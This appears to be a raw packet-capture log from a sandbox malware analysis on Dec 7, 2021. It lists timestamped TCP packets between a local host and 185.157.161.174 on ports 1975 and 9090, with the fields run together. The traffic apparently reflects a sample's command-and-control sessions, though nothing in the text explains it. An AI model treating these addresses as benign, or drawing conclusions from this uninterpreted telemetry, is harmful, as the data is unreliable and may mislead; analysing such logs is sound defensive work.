                                                                                              Dec 7, 2021 13:38:56.466397047 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466434002 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466455936 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466459990 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466465950 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466478109 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466500998 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466521978 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466543913 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466546059 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466551065 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466563940 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466586113 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466619015 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466639996 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.466659069 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466664076 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.466767073 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.500363111 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500459909 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500545025 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.500732899 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500777006 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500802994 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500825882 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500859976 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.500874043 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.500881910 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.500885010 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.501173019 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.595304966 CET8049727195.110.124.154192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.595402002 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:38:56.663788080 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663824081 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663846970 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663870096 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663892031 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663913012 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663935900 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663959026 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663965940 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.663980007 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.663990021 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.664005041 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.664028883 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.664050102 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.664060116 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.664066076 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.664119005 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:57.224387884 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:57.432979107 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:57.433151007 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:57.526293993 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:57.768978119 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:57.996484995 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:58.201898098 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:58.210165977 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:58.528815985 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:58.528918028 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:58.828633070 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:59.988374949 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:59.990309000 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.265475035 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:00.268189907 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.495218039 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:00.495435953 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.496711016 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.507508993 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.830609083 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:00.830656052 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:00.838443041 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.996781111 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:00.999211073 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.052093029 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.052354097 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.059089899 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.206280947 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.206340075 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.212120056 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.225052118 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.228054047 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.397078037 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.509771109 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.531090021 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.612473011 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.613163948 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.613292933 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.653749943 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.878995895 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.891618967 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.917208910 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917238951 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917254925 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917270899 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917287111 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917304039 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917315960 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.917320013 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917335987 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917351961 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917356968 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.917367935 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:01.917391062 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:01.917418957 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.119496107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119556904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119575024 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119592905 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119610071 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119627953 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119646072 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119666100 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119684935 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119704962 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119724989 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119743109 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119764090 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119781971 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119800091 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119801044 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.119823933 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119839907 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119863987 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119883060 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119899988 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.119899988 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.119937897 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.119970083 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.248517990 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.248620987 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.339271069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.339303017 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.339371920 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341264009 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341289997 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341309071 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341325998 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341341019 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341357946 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341363907 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341375113 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341389894 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341406107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341422081 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341438055 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341444969 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341454983 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341470957 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341475010 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341486931 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341501951 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341510057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341517925 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341536045 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341542959 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341552019 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341567993 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341569901 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341584921 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341599941 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341612101 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341615915 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341631889 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341646910 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341655016 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341661930 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341677904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341690063 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341694117 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341708899 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341725111 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341726065 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341737032 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341763973 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341794014 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.358448982 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364211082 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364244938 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364260912 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364276886 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364281893 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.364293098 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364310980 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364326954 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364327908 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.364342928 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364368916 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.496906042 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.543529034 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546708107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546750069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546775103 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546797991 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546808958 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.546823025 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546845913 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546854973 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.546895027 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547554970 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547609091 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547672033 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547698975 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547780991 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547807932 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547828913 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547979116 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.548031092 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.548387051 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552331924 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552372932 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552392960 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552397966 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552417040 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552442074 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552443981 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552465916 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552489996 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552509069 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552514076 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552535057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552536964 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552562952 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552586079 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552588940 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552608967 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552629948 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552633047 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552658081 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552675962 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552681923 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552700996 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552723885 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.559911966 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.559956074 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.559984922 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560007095 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560014963 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560028076 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560049057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560094118 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560112953 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560137987 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560161114 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560184002 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560198069 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560206890 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560234070 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560249090 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560323954 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560409069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567439079 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567482948 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567512035 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575123072 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575164080 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575184107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575202942 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575205088 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575225115 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575227976 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575244904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575284958 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.652349949 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.700017929 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.720045090 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753784895 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753829002 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753854036 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753868103 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.753875017 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753906965 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761046886 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761089087 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761112928 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761137962 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761149883 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761162043 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761178017 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761188030 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761213064 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761235952 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761240005 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761260986 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761284113 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761285067 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761307955 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761318922 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761333942 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761363029 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765074015 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765110016 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765135050 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765158892 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765177011 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765185118 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765209913 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765232086 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765234947 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765256882 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765280962 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765285015 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765309095 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765333891 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765352964 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765357971 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765378952 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765389919 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765431881 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.767894983 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.767924070 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.767947912 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.767973900 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.767983913 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.767997026 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768021107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768024921 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.768045902 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768069029 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.768071890 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768095970 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768117905 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.768121958 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.768171072 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.769113064 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.769139051 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.769156933 CET909049735185.157.161.174192.168.2.4
